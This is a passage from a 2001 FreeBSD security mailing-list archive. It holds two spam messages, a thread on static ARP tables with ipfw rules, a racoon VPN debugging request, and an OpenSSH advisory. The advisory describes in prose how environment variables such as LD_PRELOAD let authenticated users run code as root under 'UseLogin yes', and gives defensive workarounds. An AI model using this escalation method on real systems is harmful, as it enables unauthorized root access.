Veja meu site pessoal. Basta clicar no endere�o
abaixo. GARANTO SER SUI-GENERIS  -  CLIQUE ABAIXO:
http://www.pastorinha.atfreeweb.com
Mais de 162.000 internautas visitaram a PG., existe 6 �lbuns:
Se voc� quiser, por favor, indique minha Home Page, a outros
Internautas.  Mais detalhes, se comunique, passe um e-mail, que
responderei brevemente. Dentro da Home Page, ao lado das fotos,
voc� poder� saber muito mais sobre mim!
Obrigada.
e-mail: arosadesaron@zipmail.com.br
Beijos:-     Keila - Curitiba - Pr
- Podes falar comigo, direto dela. Brevemente uma Carta Aberta.
- Embora derrubem a p�gina eu a subo em 3 horas novamente.

 "Esta mensagem � enviada com a complac�ncia da nova legisla��o 
sobre
correio eletr�nico, Se��o 301, Par�grafo (a) (2) (c) Decreto S. 1618,
T�tulo Terceiro aprovado pelo "105� Congresso Base das Normativas
Internacionais sobre o SPAM". Este E-mail n�o poder� ser considerado
SPAM quando incluir uma forma de ser removido. Para ser removido
de futuros correios, simplesmente responda indicando
no Assunto: REMOVER"

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 20:11:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from main.phantom.gr.jp (main.phantom.gr.jp [61.206.12.34])
	by hub.freebsd.org (Postfix) with ESMTP id 40D0737B416
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 20:11:34 -0800 (PST)
Received: from mta.excite.com (11Cust211.tnt4.plano.tx.temp.da.uu.net [67.203.104.211]) by main.phantom.gr.jp with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id YGYGXYRM; Wed, 5 Dec 2001 16:17:30 +0900
Message-ID: <000005092ca0$00005edb$00005381@mta.excite.com>
To: <Business-Owner@FreeBSD.ORG>
From: RichMedia2@excite.com
Subject: Rich Media E-Mail Messages At The Price Of HTML                  
Date: Wed, 05 Dec 2001 01:18:20 -1800
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Reply-To: RichMedia7@excite.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

<html>
<BODY leftmargin=3D"0" topmargin=3D"0" marginwidth=3D"0" marginheight=3D"0=
">
<META content=3D"Microsoft FrontPage 5.0" name=3DGENERATOR>
<DIV>&nbsp;&nbsp;</DIV>
<CENTER>
  <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D560 border=3D0>
    <TBODY> 
    <TR> 
      <TD align=3Dmiddle colSpan=3D3><IMG height=3D20 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/topbar.gif" width=3D580 NOSEND=3D"1"></=
TD>
    </TR>
    <TR> 
      <TD width=3D4 bgColor=3D#467ec3><IMG height=3D1 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 border=3D0 NOSEND=3D=
"1"></TD>
      <TD width=3D570> 
        <TABLE cellSpacing=3D0 cellPadding=3D0 bgColor=3D#467ec4 border=3D=
0>
          <TBODY> 
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3 height=3D15> 
              <div align=3D"center"><font face=3D"Verdana, Arial, Helvetic=
a, sans-serif" 
            color=3Dwhite size=3D3><b><a target=3D_blank href=3D"http://20=
9.164.32.74/promo_mailer/jumper.html"><font 
            color=3D#ffffff size=3D2>Click here if you are unable to view =
the following 
                Rich Media message</font></a></b></font></div>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D1 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          <TR> 
            <TD vAlign=3Dcenter align=3Dmiddle bgColor=3D#467ec3 colSpan=3D=
3 height=3D"1"><IMG height=3D1 src=3D"http://209.164.32.74/promo_mailer/Wr=
apper_files/shim.gif" width=3D1 NOSEND=3D"1"> 
              <CENTER>
              <p></p>
              </CENTER>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3Dwhite colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D5 width=3D564 border=3D=
0 height=3D"48">
                <TBODY> 
                <TR> 
                  <TD width=3D45>&nbsp;</TD>
                  <TD vAlign=3Dtop width=3D480 bgColor=3Dwhite> 
                    <DIV align=3Dcenter><IMG height=3D1 src=3D"http://209.=
164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1"><BR>
                      <FONT 
                  face=3D"Arial, Helvetica, sans-serif"><B>FINALLY! Rich M=
edia E-Mail 
                      Messages At The Price Of HTML, <br>
                      X<font size=3D"3">-stream-Mail</font> Slashes the Pr=
ice Barrier 
                      - $299 Special</B></FONT><B><BR>
                      </B></DIV>
                  </TD>
                  <TD width=3D9>&nbsp;</TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR> 
            <TD align=3Dmiddle bgColor=3D#ffffff colSpan=3D3 height=3D"225=
"> 
              <p align=3D"center"><object 
            codebase=3Dhttp://download.macromedia.com/pub/shockwave/cabs/f=
lash/swflash.cab#version=3D4,0,2,0 
            classid=3Dclsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=3D4=
00 
            height=3D300>
                  <param name=3D"movie" value=3D"http://209.164.32.74/prom=
o_mailer/Wrapper_files/ngemercial5.swf">
                  <param name=3D"_cx" value=3D"10583">
                  <param name=3D"_cy" value=3D"7938">
                  <param name=3D"Movie" value=3D"http://209.164.32.74/prom=
o_mailer/Wrapper_files/ngemercia5.swf">
                  <param name=3D"Src" value=3D"http://209.164.32.74/promo_=
mailer/Wrapper_files/ngemercial5.swf">
                  <param name=3D"WMode" value=3D"Window">
                  <param name=3D"Play" value=3D"-1">
                  <param name=3D"Loop" value=3D"-1">
                  <param name=3D"Quality" value=3D"High">
                  <param name=3D"SAlign" value=3D"">
                  <param name=3D"Menu" value=3D"-1">
                  <param name=3D"Base" value=3D"">
                  <param name=3D"Scale" value=3D"ShowAll">
                  <param name=3D"DeviceFont" value=3D"0">
                  <param name=3D"EmbedMovie" value=3D"0">
                  <param name=3D"BGColor" value=3D"">
                  <param name=3D"SWRemote" value=3D"">
                  <embed src=3D"http://209.164.32.74/promo_mailer/Wrapper_=
files/ngemercial5.swf" type=3D"application/x-shockwave-flash" width=3D"400=
" height=3D"300" pluginspage=3D"http://www.macromedia.com/shockwave/downlo=
ad/index.cgi?P1_Prod_Version=3DShockwaveFlash" quality=3D"best" play=3D"tr=
ue">
                  </embed></object></p>
              </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D571 bgColor=3D=
#467ec4 
            border=3D0>
                <TBODY> 
                <TR> 
                  <TD colSpan=3D3> 
                    <TABLE height=3D81 cellSpacing=3D0 cellPadding=3D0 wid=
th=3D"100%" 
                  border=3D0>
                 </TABLE>
                  </TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#ffffff colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=
=3D0>
                <TBODY> 
                <TR bgColor=3D#467ec3> 
                  <TD><IMG height=3D1 src=3D"http://209.164.32.74/promo_ma=
iler/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1"></TD>
                </TR>
                <TR> 
                  <TD vAlign=3Dtop align=3Dmiddle> 
                    <TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" =
border=3D0>
                      <TBODY> 
                      <TR> 
                        <TD valign=3D"top"> 
                          <DIV align=3Djustify> 
                            <P><FONT face=3D"Arial, Helvetica, sans-serif"=
 size=3D1>Ever 
                              wonder how these types of rich media e-mails=
 are 
                              created? Do you wish you could produce or se=
ll this 
                              type of service? Did you think you could nev=
er afford 
                              to implement such a campaign? Now you can. X=
-stream-Mail 
                              will help you create, deliver and track targ=
eted 
                              and global rich media E-Mail marketing campa=
igns 
                              delivering effective messaging that gets att=
ention, 
                              plus online statistics and reporting analysi=
s that 
                              help you make decisions. X-stream-Mail's ser=
vices 
                              are creative, responsive, and affordable. </=
FONT></P>
                            <P align=3D"center"><b><font face=3D"Arial, He=
lvetica, sans-serif" size=3D"3">Contact 
                            X-stream-Mail</font><font face=3D"Arial, Helve=
tica, sans-serif" size=3D"3"> 
                              Today For More Details</font></b></P>
                            <form action=3D"mailto:RichMedia1@excite.com?s=
ubject=3DDirect Email Inquiry" method=3D"POST" enctype=3D"text/plain">
                              <div align=3D"center"> 
                                <center>
                                  <table height=3D"226" width=3D"300" bgco=
lor=3D"#ffffff">
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"19"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">First 
                                          Name:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"19"> 
                                        <input value=3D" " name=3D" FIRST =
NAME " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <p align=3D"right"><font face=3D"A=
rial" size=3D"2">Last 
                                          Name:</font> 
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" LAST N=
AME " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">City:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" City "=
 coname=3D"COMPANY_NAME" size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">State:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" STATE =
" size=3D"20">
                                        &nbsp;&nbsp; </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">Zip 
                                          Code :</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" Zip Co=
de " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" color=3D"#000000"><font size=3D"2">Daytime&nbsp;</font><font face=3D=
"Arial, Helvetica, sans-serif" size=3D"2">Phone:</font></font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" NIGHT =
PHONE " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <p align=3D"right"> <font face=3D"=
Arial, Helvetica, sans-serif" size=3D"2">Nighttime 
                                          Phone:</font> 
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" NIGHT =
PHONE " size=3D"20">
                                      </td>
                                    </tr>
                                  </table>
                                </center>
                              </div>
                              <div align=3D"center"> &nbsp; </div>
                              <div align=3D"center"> 
                                <input type=3D"submit" value=3D" Submit In=
formation" name=3D" submit ">
                              </div>
                            </form>
                            <P align=3D"center"><font face=3D"Arial, Helve=
tica, sans-serif" size=3D1>&nbsp;</font><font size=3D"2"><i><span style=3D=
"font-size: 10pt; font-family: Arial">If 
                              you think, that you will not benefit from th=
is correspondence</span>, 
                              please <a href=3D"http://www.removeyou.com">=
click 
                              here</a> </i></font></P>
                          </DIV>
                        </TD>
                      </TR>
                      </TBODY>
                    </TABLE>
                  </TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR align=3Dright> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D5 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D1 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          </TBODY>
        </TABLE>
      </TD>
      <TD width=3D4 bgColor=3D#467ec3><IMG height=3D1 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 border=3D0 NOSEND=3D=
"1"></TD>
    </TR>
    </TBODY>
  </TABLE>
</CENTER>
</BODY>
</HTML>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 23:15: 1 2001
Delivered-To: freebsd-security@freebsd.org
Received: from snipe.prod.itd.earthlink.net (snipe.mail.pas.earthlink.net [207.217.120.62])
	by hub.freebsd.org (Postfix) with ESMTP
	id 9B0C337B405; Thu,  6 Dec 2001 23:14:53 -0800 (PST)
Received: from dialup-209.245.134.25.dial1.sanjose1.level3.net ([209.245.134.25] helo=blossom.cjclark.org)
	by snipe.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16CFDJ-0006jH-00; Thu, 06 Dec 2001 23:14:48 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB77E1e12693;
	Thu, 6 Dec 2001 23:14:01 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 6 Dec 2001 23:14:01 -0800
From: "Crist J . Clark" <cristjc@earthlink.net>
To: Bill Fenner <fenner@research.att.com>
Cc: net@freebsd.org, security@freebsd.org
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011206231401.N8975@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com> <20011205121928.A3061@blossom.cjclark.org> <200112062059.MAA02282@windsor.research.att.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200112062059.MAA02282@windsor.research.att.com>; from fenner@research.att.com on Thu, Dec 06, 2001 at 12:59:39PM -0800
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, Dec 06, 2001 at 12:59:39PM -0800, Bill Fenner wrote:
> 
> Garrett and I discussed what IFF_NOARP should mean about 4-5 years
> ago; we decided that it probably menat "no ARP".  We discussed
> the idea of seperating it out into two flags; "Don't reply to ARP"
> and "don't pay attention to ARP" but decided to wait and see what
> people thought.  4-5 years is probably enough time to wait =)
> 
> My proposal: keep IFF_NOARP, but add IFF_NOSENDARP and IFF_NOREPLYARP
> (or something, I'm no good at making up names).  I agree with Louie
> that it makes sense for these to be per-interface as opposed to
> Ruslan's sysctl.

If this is really want to do, I believe you can do it with existing
tools.

For simplicity, I'm just going to illustrate a way to set it up rather
than explain it. Store your IP-MAC address pairs in flat file as
proscribed in arp(8),

	192.168.10.2	01:02:03:10:11:12
	192.168.10.4	01:02:03:21:22:23
	...

Load your permanent ARP table with a simple,

	arp -f arp_list.txt

In the startup and include,

	while read $IP $MAC; do
		ipfw add pass ip from $IP to any via if0
		ipfw add pass ip from any to $IP via if0
	done < arp_list.txt

	ipfw add deny ip from any to any via if0

In your rc.firewall.

Now you have a static ARP table and all traffic not from those IP
addresses is blocked. Since we never ARP for any other addresses, the
packets are blocked before we ARP for them, we never get other entries
in the ARP table.

At least I think this should do what you want. I still am not quite
sure what a "one-way ARP" is supposed to gain.
-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7  1: 6:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65])
	by hub.freebsd.org (Postfix) with ESMTP
	id 62AC637B41E; Fri,  7 Dec 2001 01:06:15 -0800 (PST)
Received: (from ru@localhost)
	by whale.sunbay.crimea.ua (8.11.6/8.11.2) id fB795gb24480;
	Fri, 7 Dec 2001 11:05:42 +0200 (EET)
	(envelope-from ru)
Date: Fri, 7 Dec 2001 11:05:42 +0200
From: Ruslan Ermilov <ru@FreeBSD.ORG>
To: Bill Fenner <fenner@research.att.com>
Cc: cjclark@alum.mit.edu, net@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011207110542.J13705@sunbay.com>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com> <20011205121928.A3061@blossom.cjclark.org> <200112062059.MAA02282@windsor.research.att.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200112062059.MAA02282@windsor.research.att.com>
User-Agent: Mutt/1.3.23i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, Dec 06, 2001 at 12:59:39PM -0800, Bill Fenner wrote:
> 
> Garrett and I discussed what IFF_NOARP should mean about 4-5 years
> ago; we decided that it probably menat "no ARP".  We discussed
> the idea of seperating it out into two flags; "Don't reply to ARP"
> and "don't pay attention to ARP" but decided to wait and see what
> people thought.  4-5 years is probably enough time to wait =)
> 
Heh, but only a few months ago IFF_NOARP started to DTRT.

> My proposal: keep IFF_NOARP, but add IFF_NOSENDARP and IFF_NOREPLYARP
> (or something, I'm no good at making up names).  I agree with Louie
> that it makes sense for these to be per-interface as opposed to
> Ruslan's sysctl.
> 
What you propose is even more "flexible".  :-)
What's the purpose to send arp requests (!IFF_NOSENDARP) if we're not
going to listen the replies (IFF_NOREPLYARP)?

Also, ifnet.if_flags is declared "short" and is already fully allocated.
Changing it to u_int64_t would mean introducing binary incompatibility,
and what's worse, API changes, since ifreq.ifr_flags is also "short".

OK, I have a proposal that should fit both opinions.  I'll keep the
net.link.ether.inet.static_arp to mean what it means now (keep ARP
table static, no updates except from local process through a routing
socket writes), and will add another sysctl that will switch the
meaning of IFF_NOARP from "no arp" to "static arp on this interface".
How about this?


Cheers,
-- 
Ruslan Ermilov		Oracle Developer/DBA,
ru@sunbay.com		Sunbay Software AG,
ru@FreeBSD.org		FreeBSD committer,
+380.652.512.251	Simferopol, Ukraine

http://www.FreeBSD.org	The Power To Serve
http://www.oracle.com	Enabling The Information Age

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7  1:57:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 7E41537B41F
	for <freebsd-security@freebsd.org>; Fri,  7 Dec 2001 01:57:13 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB79v7E08148
	for <freebsd-security@freebsd.org>; Fri, 7 Dec 2001 09:57:07 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id JAA24864
	for freebsd-security@freebsd.org; Fri, 7 Dec 2001 09:57:07 GMT
From: freebsd-security-local@insignia.com
To: freebsd-security@freebsd.org
Subject: Racoon <> VPN Gateway
Date: Fri, 07 Dec 2001 09:57:06 +0000
Message-ID: <c7411ug95bmgi7f2vqok8aja61k3h0j08f@4ax.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I've now got further trying to get racoon talking to a Redcreek
Ravlin10 VPN gateway, once I realised the gif device is needed
for tunnel mode. It actually replies to me, though the reply
isn't what racoon seems to expect.

I'm trying to establish an ESP tunnel mode connection between
213.208.123.252 (racoon) and 195.74.141.60 (Ravlin).

Racoon says:

>2001-12-06 20:44:02: DEBUG: plog.c:193:plogdump():
>570f2123 9cb90864 e32f2052 6e2fe2bd 04100200 00000000 000000b8 0a000084
>1d6d8373 a942cbac fc328e32 c481ac14 6ea02c98 dfc8bb4b 036e3490 d44d34ea
>7ae463ee 7da2990e d71befaf 12d513e8 1adead04 124313fb d6b67934 eba66183
>7decaa74 1d9cf00b c8bd6062 30da7328 d1f0dd63 afb89a74 7e1fa81b 1fd0232a
>114926c8 82744516 bd228bf0 15c579be 8e9b416a 69fae755 373629bd 7101dcdf
>00000018 8cebacef 4255a2b7 03ef7636 5fedb40d 7063d89f
>2001-12-06 20:44:02: DEBUG: isakmp.c:2290:isakmp_printpacket(): begin.
>44:02.139797 195.74.141.60:500 -> 213.208.123.252:500: isakmp 1.0 msgid 00000000:
>phase 1 ? ident:
>    (ke: key len=128)
>    (nonce: n len=20)
>2001-12-06 20:44:02: DEBUG: isakmp.c:394:isakmp_main(): malformed cookie received
>or the spi expired.

whereas the Ravlin says:

>Dec  6 20:46:30 ravlin10 [051b4216] 101-12-06/20:45:05(GMT)  Received ISAKMP initi
>alization request. Peer:  (213.208.123.252)
>Dec  6 20:46:32 ravlin10 [03044222] 101-12-06/20:45:07(GMT)  Invalid payload. Poss
>ible overrun attack!  ()

and a little later racoon says:

>>2001-12-06 20:57:30: DEBUG: isakmp.c:1133:isakmp_parsewoh(): begin.
>>2001-12-06 20:57:30: DEBUG: isakmp.c:1160:isakmp_parsewoh(): seen nptype=11(notify
>>)
>>2001-12-06 20:57:30: DEBUG: isakmp.c:1166:isakmp_parsewoh(): invalid length of pay
>>load
>>2001-12-06 20:57:50: DEBUG: isakmp.c:1482:isakmp_ph1resend(): resend phase1 packet
>> 0dc9fec8ecc746c3:fbeee539edff5c7e

and the Ravlin says:

>Dec  6 20:59:37 ravlin10 [051b4216] 101-12-06/20:58:12(GMT)  Received ISAKMP initi
>alization request. Peer:  (213.208.123.252)
>Dec  6 20:59:38 ravlin10 [03044222] 101-12-06/20:58:13(GMT)  Invalid payload. Poss
>ible overrun attack!  ()

If there are any racoon experts out there who can shed light on this
I'd be most grateful. I had to change the default racoon.conf from
agressive to main mode to get this far.

Jim Hatfield


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Fri Dec  7  4:30:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id 1372A37B419; Fri,  7 Dec 2001 04:30:12 -0800 (PST)
Received: (from nectar@localhost)
	by freefall.freebsd.org (8.11.6/8.11.6) id fB7CUCd66495;
	Fri, 7 Dec 2001 04:30:12 -0800 (PST)
	(envelope-from security-advisories@freebsd.org)
Date: Fri, 7 Dec 2001 04:30:12 -0800 (PST)
Message-Id: <200112071230.fB7CUCd66495@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f
From: FreeBSD Security Advisories <security-advisories@freebsd.org>
To: FreeBSD Security Advisories <security-advisories@freebsd.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:63.openssh
Reply-To: security-advisories@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:63                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          OpenSSH UseLogin directive permits privilege escalation
                [REVISED]

Category:       core/ports
Module:         openssh
Announced:      2001-12-02
Revised:        2001-12-06
Credits:        Markus Friedl <markus@OpenBSD.org>
Affects:        FreeBSD 4.3-RELEASE, 4.4-RELEASE
                FreeBSD 4.4-STABLE prior to the correction date
                Ports collection prior to the correction date
Corrected:      2001-12-03 00:53:28 UTC (RELENG_4)
                2001-12-03 00:54:18 UTC (RELENG_4_4)
                2001-12-03 00:54:54 UTC (RELENG_4_3)
                2001-12-02 06:52:40 UTC (openssh port)
FreeBSD only:   NO

0.   Revision History

v1.0  2001-12-02  Initial release
v1.1  2001-07-31  Corrected patch instructions

I.   Background

OpenSSH is an implementation of the SSH1 and SSH2 secure shell
protocols for providing encrypted and authenticated network access,
which is available free for unrestricted use. Versions of OpenSSH are
included in the FreeBSD ports collection and the FreeBSD base system.

II.  Problem Description

OpenSSH includes a feature by which a user can arrange for
environmental variables to be set depending upon the key used for
authentication.  These environmental variables are specified in the
`authorized_keys' (SSHv1) or `authorized_keys2' (SSHv2) files in the
user's home directory on the server.  This is normally safe, as this
environment is passed only to the user's shell, which is invoked with
user privileges.

However, when the OpenSSH server `sshd' is configured to use
the system's login program (via the directive `UseLogin yes' in
sshd_config), this environment is passed to login, which is invoked
with superuser privileges.  Because certain environmental variables
such as LD_LIBRARY_PATH and LD_PRELOAD can be set using the previously
described feature, the user may arrange for login to execute arbitrary
code with superuser privileges.

All versions of FreeBSD 4.x prior to the correction date including
FreeBSD 4.3 and 4.4 are potentially vulnerable to this problem.
However, the OpenSSH server is configured to not use the system login
program (`UseLogin no') by default, and is therefore not vulnerable
unless the system administrator has changed this setting.

In addition, there are two versions of OpenSSH included in the
ports collection.  One is ports/security/openssh, which is the
BSD-specific version of OpenSSH.  Versions of this port prior to
openssh-3.0.2 exhibit the problem described above.  The other is
ports/security/openssh-portable, which is not vulnerable, even if the
server is set to `UseLogin yes'.

III. Impact

Hostile but otherwise legitimate users that can successfully
authenticate using public key authentication may cause /usr/bin/login
to run arbitrary code as the superuser.

If you have not enabled the 'UseLogin' directive in the sshd
configuration file, you are not vulnerable to this problem.

IV.  Workaround

Doing one of the following will eliminate the vulnerability:

1) Configure sshd to not use the system login program.  Edit the
   server configuration file and change any `UseLogin' directives
   to `UseLogin no'.  This is the preferred workaround.

2) If for whatever reason, disabling `UseLogin' is not possible,
   then one can instead disable public key authentication.  Edit the
   server configuration file and change any `RSAAuthentication',
   `DSAAuthentication', or `PubKeyAuthentication' directives
   to `RSAAuthentication no', `DSAAuthentication no', and
   `PubKeyAuthentication no', respectively.

For sshd included in the base system (/usr/bin/sshd), the
server configuration file is `/etc/ssh/sshd_config'.  For sshd
from the ports collection, the server configuration file is
`/usr/local/etc/sshd_config'.

